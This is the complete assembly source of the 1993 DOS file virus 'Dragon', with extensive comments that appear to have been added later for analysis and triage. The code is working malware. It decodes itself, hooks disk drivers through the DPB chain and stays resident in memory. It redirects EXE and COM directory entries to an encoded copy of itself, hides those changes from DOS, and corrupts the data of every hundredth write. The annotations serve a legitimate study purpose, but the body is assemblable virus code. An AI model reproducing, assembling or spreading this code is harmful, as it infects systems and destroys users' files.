; +--------------------------------------------+
; |  MicroVirus Corp.                          |
; |  Author: anti                              |
; |  VIRUS FAMILY: Dragon                      |
; |  VERSION: 1.0                              |
; +--------------------------------------------+
;
; +-------------------------+------------------+
; | Name: DARGON-1024       | Target: EXE, COM |
; | Rating: Dangerous       | Stealth: Yes     |
; | Tsr: Yes                | Phantom: Yes     |
; | Arming: Yes             | Danger(6): 4     |
; | Attack Speed: Very Fast | Clock: No        |
; | Text Strings: Yes       | Echo: Yes        |
; +-------------------------+------------------+
; | Find Next Target: SCANNING ROOT DIRECTORY  |
; | Other viruses: none                        |
; +--------------------------------------------+

code            segment para 'code'
                assume  cs:code,ds:code
                org     100h                    ; COM image, entry at offset 100h

;-----------------------------------------------------------------------
; dragon - entry point (analysis annotations; the code itself is unchanged).
;
; What the visible code does, in order:
;   1. XOR-decodes the body that follows the 14-byte stub (key is an
;      immediate that InfectDisk rewrites in each written copy).
;   2. Walks the DOS Drive Parameter Block (DPB) chain and, for every DPB
;      whose device-header pointer lies in segment 70h, redirects that
;      pointer to the `header` structure in this segment.
;   3. Saves the original driver's strategy/interrupt offsets into the
;      far-call stubs inside OrigDrive.
;   4. Shrinks its memory block to 128 paragraphs and rewrites the owner
;      field of its MCB to 0008h.
;   5. Issues an open for c:\dragon.com, frees its environment block,
;      then EXECs a program and terminates.
;
; Observable artefacts for triage (all taken from this listing): a DPB
; device-header pointer that no longer points into segment 70h, an MCB
; with owner 0008h in front of a 128-paragraph block, and the file name
; string 'c:\dragon.com'.
;-----------------------------------------------------------------------
dragon          proc
                mov     di,offset Begin         ; DI -> first encoded byte
                mov     cx,1010                 ; loop count (one word XOR per byte step)

                mov     ax,00h                  ; key immediate; InfectDisk stores the key at
                                                ; copy+7, i.e. into this operand
Decode:         xor     word ptr [di],ax        ; overlapping word XOR: DI advances by 1,
                inc     di                      ; so successive words share a byte
                loop    Decode

Begin:          mov     ah,30h                  ; INT 21h/30h: get DOS version (AL = major)
                int     21h                     ;DOS

                cmp     al,04h                  ;DOS 4.x+ : SI = 0
                sbb     si,si                   ;DOS 2/3 : SI = -1
                                                ; SI is used below as a -1/0 adjustment to
                                                ; every DPB field offset

                mov     ah,52h                  ; INT 21h/52h: get DOS List of Lists,
                int     21h                     ; returned in ES:BX

                lds     bx,es:[bx]              ; DS:BX -> first DPB
                                                ;( Drive Parametr Block)
search:         mov     ax,[bx+si+15h]          ; AX = segment part of the DPB's device-header pointer
                cmp     ax,70h                  ; is the driver in segment 70h?
                jne     next                    ; no - go to the next DPB
                xchg    ax,cx                   ; keep that segment in CX
                mov     [bx+si+18h],byte ptr -1 ; NOTE(review): presumably the DPB "not yet
                                                ; accessed" flag, forcing DOS to re-query the
                                                ; media - confirm against the DPB layout
                mov     di,[bx+si+13h]          ; DI = offset of the original device header,
                                                ; so CX:DI addresses the original driver
                                                ; header

                mov     [bx+si+13h],offset header ; redirect the DPB to this segment's header
                mov     [bx+si+15h],cs
next:           lds     bx,[bx+si+19h]          ; follow the next-DPB pointer
                cmp     bx,-1                   ; offset FFFFh marks the end of the chain
                jne     search

                mov     ds,cx                   ; DS = segment of the original driver
                                                ; (only set if a segment-70h DPB was found)
                les     ax,[di+6]               ; AX = word at header+6 (strategy offset),
                                                ; ES = word at header+8 (interrupt offset)

                mov     word ptr cs:Strat,ax    ; patch the two far-call operands
                mov     word ptr cs:Intr,es     ; inside OrigDrive

                push    cs
                pop     es                      ; ES = this program's segment (its PSP)

                mov     bx,128                  ; INT 21h/4Ah: resize block at ES to
                mov     ah,4ah                  ; 128 paragraphs = 2048 bytes
                int     21h

                mov     ax,cs                   ; the MCB sits one paragraph below the block
                dec     ax
                mov     es,ax
                mov     word ptr es:[01h],08h   ; MCB owner := 0008h; presumably so the block
                                                ; is not released when this process exits

                push    cs
                pop     ds                      ; DS = CS again

                mov     byte ptr Drive+1,-1     ; reset the "last drive" immediate in CheckDrive

                mov     dx,offset File          ; INT 21h/3Dh: open c:\dragon.com. The result is
                mov     ah,3dh                  ; never used; the call presumably exists only to
                int     21h                     ; drive disk requests on C: through the hook

                mov     bx,ds:[2ch]             ; BX = environment segment from PSP:2Ch
                mov     es,bx                   ;PSP
                mov     ah,49h                  ; INT 21h/49h: free the block at ES
                int     21h
                xor     ax,ax                   ; AX = 0 for the scan below
                test    bx,bx                   ;BX = 0?
                jz      boot                    ; no environment segment: take the other path
                mov     di,1                    ; scan the (already freed) environment for a
seek:           dec     di                      ; zero word, stepping one byte at a time
                scasw                           ; (scasw adds 2, dec di takes 1 back)
                jne     seek
                lea     dx,[di+2]               ; DX = DI+2: skips one more word after the
                                                ; terminator; used as the EXEC path offset
                push    es
                jmp     short exec

boot:           mov     es,ds:[16h]             ; ES = word at PSP:16h (parent PSP segment)
                mov     bx,es:[16h]             ; BX = the same field in that PSP
                dec     bx                      ; one paragraph lower (an MCB address)
                xor     dx,dx
                push    es

exec:           push    bx                      ; value that becomes DS for the EXEC call
                mov     bx,offset param         ; BX -> EXEC parameter block
                mov     [bx+4],cs               ; segment of command tail (offset 80h)
                mov     [bx+8],cs               ; segment of first FCB (offset 5Ch)
                mov     [bx+12],cs              ; segment of second FCB (offset 6Ch)
                pop     ds                      ; DS = the BX pushed above

                mov     ax,4b00h                ; INT 21h/4B00h: load and execute DS:DX
                int     21h
                mov     ah,4ch                  ; INT 21h/4Ch: terminate
                int     21h

; *** Device Driver's Strategy Block ***

;-----------------------------------------------------------------------
; Strategy - replacement strategy routine named in `header`.
;
; In:  ES:BX = DOS device request header (as passed to any strategy
;      routine). Fields read here: +1 unit, +2 command, +0Eh transfer
;      address, +12h sector count, +14h starting sector.
; Out: all registers and flags restored; returns with RETF.
;
; Behaviour visible in the code:
;   * Commands other than 04h, 08h, 09h are passed straight to the
;     original driver.
;   * For 04h/08h/09h the original driver runs first, then CheckDrive
;     decides whether InfectDisk must re-read the volume geometry.
;   * Requests whose start sector lies inside [FirstSector, LastSector]
;     (immediates patched by InfectDisk) are treated as directory
;     sectors and handed to ChangeSector.
;   * Write requests above that range are counted in RecNum; on the
;     100th one DestroyFile overwrites the start of the caller's buffer
;     before the original driver is called again.
;-----------------------------------------------------------------------
Strategy:       pushf
                push    ax
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    ds

                push    es
                pop     ds                      ; DS = ES, so [bx+n] addresses the request header

                mov     ah,[bx+2]               ; AH : DOS command code
                cmp     ah,04h                  ; input (read)?
                je      Work
                cmp     ah,08h                  ; output (write)?
                je      Work
                cmp     ah,09h                  ; output with verify?
                je      Work
                jmp     FuckOut                 ; anything else: just forward it

Work:           call    OrigDrive               ; let the original driver service the request
                call    CheckDrive              ; ZF=1: same unit as last time and media unchanged
                je      CheckData               ; yes - geometry values are still valid
                call    InfectDisk              ; no  - rebuild geometry and write the body

CheckData:      mov     ax,[bx+14h]             ; AX = starting sector of the request
FirstSector:    cmp     ax,10h                  ; immediate patched: first directory sector
                jb      FuckOut                 ; below it (boot/FAT area) - forward only
LastSector:     cmp     ax,21h                  ; immediate patched: first sector after the directory
                ja      FuckFile                ; above it - data area handling

                call    ChangeSector            ; directory sector: rewrite entries
                jmp     Exit

FuckFile:       mov     ah,es:[bx+2]            ; AH : DOS command code
                cmp     ah,08h                  ; write?
                je      GoAhead
                cmp     ah,09h                  ; write with verify?
                jne     FuckOut                 ; reads are forwarded untouched

GoAhead:        mov     ax,es:[bx+14h]          ; starting sector of the write
                cmp     ax,word ptr cs:LastSector+1 ; below the patched data-area bound?
                jb      FuckOut
                inc     cs:RecNum               ; count data-area writes
                cmp     cs:RecNum,64h           ; 100 reached?
                jne     FuckOut
                mov     cs:RecNum,00h           ; restart the counter
                call    DestroyFile             ; overwrite the start of the outgoing buffer

FuckOut:        call    OrigDrive               ; forward the (possibly altered) request
Exit:           pop     ds
                pop     di
                pop     si
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                popf
Inter:          retf                            ; also serves as the header's interrupt routine:
                                                ; a bare far return

; *** Infect Disk ***

;-----------------------------------------------------------------------
; InfectDisk - called from Strategy when CheckDrive reports a new unit
; or changed media.
;
; In:  DS = ES, ES:BX = request header of the request being serviced.
; Out: the 11 words of the request header saved on entry are restored.
;
; Steps visible in the code:
;   1. Saves 22 bytes of the request header on the stack.
;   2. Issues command 02h (Build BPB) to the original driver and reads
;      the BPB it returns.
;   3. From the BPB computes, and patches into instruction immediates
;      elsewhere in this file: FatSec1+3, FatSecSize+2, FirstSector+1,
;      LastSector+1, Bytes+1, Cluster+1, StartSector+3.
;   4. Reads one FAT sector, marks the entry of the highest cluster as
;      end-of-chain (stepping down past entries marked bad), and writes
;      the sector back.
;   5. Copies 1024 bytes from offset 100h to VirusEnd, XOR-encodes the
;      copy with a key taken from the BIOS tick counter, and writes two
;      sectors at the patched StartSector.
;
; Because the routine rewrites immediates inside other instructions, the
; exact encoding and order of the labelled instructions matter; the
; "+n" displacements assume the current opcodes.
;-----------------------------------------------------------------------
InfectDisk      proc    near
                cld                             ; forward string ops for the save loop
                mov     cx,0bh                  ; 11 words of the request header
                mov     si,bx                   ; are pushed on the stack
Save:           lodsw
                push    ax
                loop    Save

                mov     word ptr [bx+0eh],offset VirusEnd ; transfer address := CS:VirusEnd
                mov     word ptr [bx+10h],cs
                mov     byte ptr [bx+2],02h     ; command 02h: Build BPB
                call    OrigDrive               ;( BIOS Parametr Block)

                lds     si,[bx+12h]             ; DS:SI -> BPB returned by the driver

                mov     ax,[si+11]              ; AX = sectors per FAT
                mov     word ptr cs:FatSec1+3,ax ; patched as the start sector of the FAT read
                push    ax
                dec     ax
                mov     cx,[si]                 ; CX = bytes per sector
                mul     cx                      ; AX = (sectors per FAT - 1) * bytes per sector
                mov     word ptr cs:FatSecSize+2,ax ; byte offset of the FAT sector that is read
                pop     ax
                shl     ax,01h                  ; 2 * sectors per FAT (two FAT copies assumed)
                add     ax,[si+3]               ; + reserved sectors = first directory sector
                mov     word ptr cs:FirstSector+1,ax
                push    ax

                xor     dx,dx
                mov     ax,[si]                 ; bytes per sector again
                mov     word ptr cs:Bytes+1,ax  ; patched into ChangeSector
                mov     cx,20h                  ; 32 bytes per directory entry
                div     cx                      ; AX = entries per sector
                mov     cx,ax
                mov     ax,[si+6]               ; AX = number of root directory entries
                div     cx                      ; AX = sectors occupied by the root directory

                pop     di
                add     di,ax                   ; DI = first sector of the data area
                mov     word ptr cs:LastSector+1,di
                mov     ax,[si+8]               ; AX = total sector count
                push    ax
                xor     cx,cx
                mov     cl,[si+2]               ; CX = sectors per cluster
                mov     word ptr cs:Cluster+1,cx ; patched into Bad

                sub     ax,cx                   ; total sectors - sectors per cluster:
                mov     word ptr cs:StartSector+3,ax ; start sector of the last cluster
                pop     ax
                sub     ax,di                   ; data-area sectors
                xor     dx,dx
                div     cx                      ; / sectors per cluster
                inc     ax                      ; + 1 -> number used for the last cluster

                push    es
                pop     ds                      ; DS:BX = request header again

FatSec1:        mov     word ptr [bx+14h],01h   ; start sector (immediate patched above)
                mov     word ptr [bx+12h],01h   ; one sector
                mov     byte ptr [bx+2],04h     ; command 04h: read
                call    OrigDrive
                lds     si,[bx+0eh]             ; DS:SI -> the sector just read
                push    bp

                mov     bp,ax                   ; BP = cluster number (relies on AX surviving
                                                ; the driver call - not verifiable here)
                cmp     ax,0ff6h                ; 0FF6h or more clusters: 16-bit FAT
                jae     Fat16Bit

More12Bit:      mov     ax,bp                   ; 12-bit FAT: entry offset = cluster * 3 / 2
                mov     cx,03h
                mul     cx
                shr     ax,01h

                mov     di,ax
                add     di,si
FatSecSize:     sub     di,100h                 ; immediate patched: rebase onto the sector read
                mov     ax,bp
                test    ax,01h                  ; odd cluster number? (flags kept across mov)
                mov     ax,[di]                 ; AX = word holding the FAT entry
                jnz     Chet

                and     ax,0fffh                ; even: keep the low 12 bits
                jmp     GoOn

Chet:           mov     cl,04h                  ; odd: shift the word left by 4
                shl     ax,cl
                jmp     GoOn

GoOn:           cmp     ax,0ff7h                ; bad-cluster mark?
                je      Bad12Bit

                test    bp,01h
                jnz     ChetCluster
                or      ax,0fffh                ; even cluster: set low 12 bits (end-of-chain)
                mov     [di],ax
                jmp     Contin

ChetCluster:    mov     dx,0fffh                ; odd cluster: set high 12 bits (end-of-chain)
                mov     cl,04h
                shl     dx,cl
                or      ax,dx
                mov     [di],ax
                jmp     Contin

Rest:           jmp     Fuck                    ; no reference to this label in the listing

More16Bit:      mov     ax,bp
Fat16Bit:       mov     di,ax                   ; 16-bit FAT path: DI = cluster number + buffer
                add     di,si                   ; offset, rebased by the patched FAT offset
                sub     di,word ptr cs:FatSecSize+2
                mov     ax,[di]                 ; AX = 16-bit FAT entry
                cmp     ax,0fff7h               ; bad-cluster mark?
                je      Bad16Bit
                mov     ax,0ffffh               ; mark as end-of-chain
                mov     [di],ax
                jmp     Contin

Bad16Bit:       call    bad                     ; step to the previous cluster
                jmp     More16Bit

Bad12Bit:       call    bad                     ; step to the previous cluster
                jmp     More12Bit

Contin:         mov     word ptr cs:Location+1,bp ; cluster number patched into InfectSector
                pop     bp
                push    es
                pop     ds

                call    Write                   ; write the modified FAT sector back

                push    es                      ; keep request-header segment on the stack
                push    cs
                push    cs
                pop     ds
                pop     es                      ; DS = ES = CS for the copy

                mov     si,100h                 ; copy 1024 bytes from the start of the image
                mov     di,offset VirusEnd      ; to the scratch area after the image
                mov     cx,1024
                rep     movsb

Again:          mov     ax,40h                  ; read word 0040h:006Ch (BIOS timer tick count)
                mov     es,ax
                mov     di,6ch
                mov     ax,word ptr es:[di]

                cmp     ax,00h                  ; a zero key would leave the copy unencoded,
                je      Again                   ; so poll until the value is non-zero

                mov     word ptr cs:VirusEnd+7,ax ; key -> immediate of the copy's decode stub
                mov     word ptr cs:Key+1,ax    ; key -> immediate of the encoder below

                mov     di,offset VirusEnd      ; encode the copy, skipping its 14-byte stub
                add     di,14
                mov     cx,1010
Key:            mov     ax,00h                  ; immediate patched just above
Coding:         xor     word ptr [di],ax        ; same overlapping XOR as the Decode loop
                inc     di
                loop    Coding

                pop     es                      ; ES = request-header segment again
                push    es
                pop     ds

                mov     word ptr [bx+0eh],offset VirusEnd ; transfer address := encoded copy
                mov     word ptr [bx+10h],cs
StartSector:    mov     word ptr [bx+14h],14h   ; start sector (immediate patched above / by Bad)
                mov     word ptr [bx+12h],02h   ; two sectors
                call    Write

Fuck:           push    es                      ; restore the saved request header
                pop     ds
                std                             ; backwards: words were pushed first-to-last
                mov     cx,0bh
                mov     di,bx
                add     di,20                   ; DI -> last of the 11 saved words
Load:           pop     ax
                stosw
                loop    Load
                ret                             ; direction flag is still set here; Strategy's
                                                ; popf restores the caller's flags
InfectDisk      endp

; *** Infect or Disinfect Directory ***

;-----------------------------------------------------------------------
; ChangeSector - processes a transfer buffer that holds directory sectors.
;
; In:  DS:BX = request header (already serviced by the original driver).
; Effect: runs InfectSector over the buffer in "infect" mode (CL=0) and,
; if any entry was changed (CH != 0), writes the buffer back to disk.
; It then runs InfectSector again in "disinfect" mode (CL != 0) on the
; same buffer, so the data returned to DOS shows the original start
; clusters while the on-disk directory holds the redirected ones.
; For analysis this means a directory listing taken while the code is
; resident does not reflect what is stored on disk.
;-----------------------------------------------------------------------
ChangeSector    proc    near
                xor     dx,dx
                mov     ax,[bx+12h]             ; AX = sector count of the request
Bytes:          mov     cx,10h                  ; CX = bytes per sector (immediate patched
                                                ; by InfectDisk)
                mul     cx
                mov     di,ax                   ; DI = buffer length in bytes
                lds     si,[bx+0eh]             ; DS:SI -> transfer buffer
                add     di,si                   ; DI = offset just past the buffer
                xor     cx,cx                   ; CL = 0: infect mode, CH = 0: nothing changed

                push    ds                      ; keep buffer address for the second pass
                push    si

                call    InfectSector            ; pass 1: redirect matching entries
                jcxz    NoInfect                ; CX still 0 - nothing changed, skip the write
                call    Write                   ; write the modified directory sectors

NoInfect:       pop     si                      ; buffer address for pass 2
                pop     ds
                inc     cl                      ; CL != 0 selects the restore branch
                call    InfectSector            ; pass 2: restore entries in the buffer only
                ret
ChangeSector    endp
; *** Infect or Disinfect Files ***

;-----------------------------------------------------------------------
; InfectSector - walks 32-byte directory entries from DS:SI up to DS:DI.
;
; In:  DS:SI = first entry, DI = offset just past the last entry,
;      CL = 0 to redirect entries, CL != 0 to restore them.
; Out: CH incremented once per redirected entry.
;
; An entry is considered only if its extension is "EXE" or "COM", the
; word at +28 (low word of the file size) is at least 1024, and none of
; the attribute bits 1Ch (system, volume label, directory) is set.
;
; Redirect: the start-cluster word at +1Ah is replaced by the cluster
; number patched into `Location`, and the original value XOR 666h is
; stored in the word at +12h.
; Restore:  the word at +12h is cleared and its value XOR 666h is put
; back at +1Ah.
;
; Recovery note grounded in the two branches above: for a redirected
; entry the original start cluster is (word at +12h) XOR 666h. Many
; EXE/COM entries sharing one start cluster, together with a non-zero
; word at +12h, is the on-disk signature of this code.
;-----------------------------------------------------------------------
InfectSector    proc    near
More:           mov     ax,[si+8]               ; AX = first two extension bytes
                cmp     ax,'XE'                 ; bytes "EX" in memory order?
                jne     COM
                cmp     [si+0ah],al             ; third byte equal to AL ('E')?
                je      Infect
COM:            cmp     ax,'OC'                 ; bytes "CO" in memory order?
                jne     NextFile
                cmp     byte ptr [si+0ah],'M'
                jne     NextFile

Infect:         cmp     word ptr [si+28],1024   ; low size word below 1024?
                jb      NextFile                ; yes - skip this entry
                test    byte ptr [si+0bh],1ch   ; directory, volume label or system attribute?
                jnz     NextFile                ; yes - skip this entry
                test    cl,cl                   ; restore mode?
                jnz     Disinfect

Location:       mov     ax,714                  ; AX = cluster holding the written copy
                                                ; (immediate patched by InfectDisk)
                cmp     ax,[si+1ah]             ; entry already points there?
                je      NextFile
                xchg    ax,[si+1ah]             ; redirect entry; AX = original start cluster
                xor     ax,666h                 ; mask it with the constant 666h
                mov     [si+12h],ax             ; and park it in the entry's word at +12h
                inc     ch                      ; mark the buffer as modified
                jmp     NextFile

Disinfect:      xor     ax,ax
                xchg    ax,[si+12h]             ; AX = parked value; field cleared
                xor     ax,666h                 ; unmask
                mov     [si+1ah],ax             ; put it back as the start cluster

NextFile:       add     si,20h                  ; next 32-byte entry
                cmp     di,si
                jne     More
                ret
InfectSector    endp

; *** Destroy Files ***

;-----------------------------------------------------------------------
; DestroyFile - data-corruption payload, called from Strategy on every
; 100th write request that targets the data area.
;
; In:  ES:BX = request header of the pending write.
; Effect: copies 120 bytes starting at `CopyRight` over the beginning of
; the caller's transfer buffer, so the text strings end up in whatever
; file data is being written. ES is preserved; DS is left equal to CS.
; The strings at `CopyRight` are therefore usable as a content signature
; when checking files for damage.
;-----------------------------------------------------------------------
DestroyFile     proc    near
                push    es
                push    cs
                pop     ds                      ; DS = CS (source segment)
                les     di,es:[bx+0eh]          ; ES:DI = transfer address of the write

                mov     si,offset CopyRight     ; DS:SI = text strings in the data area
                mov     cx,120                  ; CX = number of bytes copied
                rep     movsb                   ; overwrite the start of the buffer
                pop     es
                ret
DestroyFile     endp

; *** Write to Disk ***

;-----------------------------------------------------------------------
; Write - reissues the current request header as a write.
;
; In:  ES:BX = request header with transfer address, count and start
;      sector already set by the caller.
; Effect: temporarily sets the command byte to 08h, calls the original
; driver, restores the command byte from AH, and clears bit 7 of the
; byte at +4 (the high byte of the header's status word), so an error
; raised by this extra write is not reported back to DOS.
; Relies on AH surviving the driver call - not verifiable from here.
;-----------------------------------------------------------------------
Write           proc    near
                mov     ah,es:[bx+2]            ; save the DOS command code
                mov     byte ptr es:[bx+2],08h  ; command 08h: write
                call    OrigDrive               ; call the original disk driver
                mov     es:[bx+2],ah            ; restore the DOS command code
                and     byte ptr es:[bx+4],7fh  ; clear the error bit in the status word
                ret
Write           endp

; *** Check Disk ***

;-----------------------------------------------------------------------
; CheckDrive - decides whether the cached volume geometry is still valid.
;
; In:  DS:BX = request header.
; Out: ZF = 1 only if the unit number equals the one seen on the
;      previous call AND the media-check reply byte is 01h; otherwise
;      ZF = 0 and the caller runs InfectDisk.
;
; The previous unit number is kept in the immediate operand of the
; `cmp` at label `drive` (self-modifying; the installer initialises it
; to -1). The mov/pop instructions after each compare do not alter flags.
;-----------------------------------------------------------------------
CheckDrive      proc    near
                mov     al,[bx+1]               ; AL = unit (drive) number of the request

drive:          cmp     al,-1                   ; same unit as last time? (immediate patched)
                mov     byte ptr cs:[drive+1],al ; remember this unit for the next call
                jne     Change                  ; different unit - return with ZF = 0

                push    [bx+0eh]                ; keep the word that the reply will overwrite
                mov     byte ptr [bx+2],01h     ; command 01h: media check
                call    OrigDrive               ; ask the original driver
                cmp     byte ptr [bx+0eh],01h   ; reply 01h = media not changed
                pop     [bx+0eh]
                mov     [bx+2],ah               ; restore the command code from AH (loaded in
                                                ; Strategy; assumes the driver preserved it)

Change:         ret
CheckDrive      endp

; *** Get Next Cluster ***

;-----------------------------------------------------------------------
; Bad - used by InfectDisk when the candidate cluster is marked bad.
;
; In/Out: BP = cluster number, decremented by one.
; Effect: lowers the patched start-sector immediate at StartSector+3 by
; one cluster's worth of sectors. AX returns the sectors-per-cluster
; value (immediate patched by InfectDisk at Cluster+1).
;-----------------------------------------------------------------------
Bad             proc    near
                dec     bp                      ; step to the previous cluster
Cluster:        mov     ax,00h                  ; AX = sectors per cluster (patched immediate)
                sub     word ptr cs:StartSector+3,ax ; move the write target down one cluster
                ret
Bad             endp

; *** Call Original Device Drive ***

;-----------------------------------------------------------------------
; OrigDrive - forwards the request in ES:BX to the original disk driver.
;
; The body is two hand-assembled far calls: byte 9Ah is the opcode for
; CALL FAR ptr16:16 (the original "jmp far" remarks are kept below, but
; the opcode is a call, which is why execution reaches the final RET).
; The segment word is fixed at 70h; the offset words at `Strat` and
; `Intr` are filled in by the installer from the original device header.
;-----------------------------------------------------------------------
OrigDrive       proc    near
                ; jmp far 70h:xxxxh
                db      9ah                     ; far call to the original strategy routine
Strat:          dw      ?,70h                   ; offset (patched), segment 70h
                ; jmp far 70h:xxxxh
                db      9ah                     ; far call to the original interrupt routine
Intr:           dw      ?,70h                   ; offset (patched), segment 70h
                ret
OrigDrive       endp

dragon          endp

; *** Data Area ***
;     Begin

; Replacement device header that the installer writes into each hooked DPB.
; Layout as used by the code above: +0 four bytes, +4 attribute word,
; +6 strategy offset, +8 interrupt offset, +0Ah unit count.
header:         inc     ax                      ; these two one-byte opcodes and the next word
                ret                             ; occupy the header's first four bytes
                dw      1
                dw      2000h                   ; device attribute word (bit 13 set)
                dw      offset Strategy         ; offset of the strategy routine
                dw      offset Inter            ; offset of the interrupt routine (bare RETF)
                db      7fh                     ; number of units

file            db      'c:\dragon.com',0       ; name opened once by the installer
param           dw      0,80h,?,5ch,?,6ch,?     ; EXEC parameter block: environment 0, then
                                                ; command tail / FCB1 / FCB2 offsets; the
                                                ; '?' segment words are filled with CS

; Text copied into outgoing write buffers by DestroyFile (120 bytes from CopyRight).
CopyRight       db      'DRAGON ver 1.0 Copyright (c) MicroVirus Corp. 1993',0
Lords           db      'The Lords of the Computers !',0,0
Lord            db      'DRAGON - the Lord of Disks !',0,0
Author          db      'anti'
RecNum          db      ?                       ; counter of data-area write requests
VirusEnd        db      ?                       ; end of image; also the scratch buffer used
                                                ; for BPB/FAT reads and the encoded copy

; *** Data Area ***
;     End

code ends
end dragon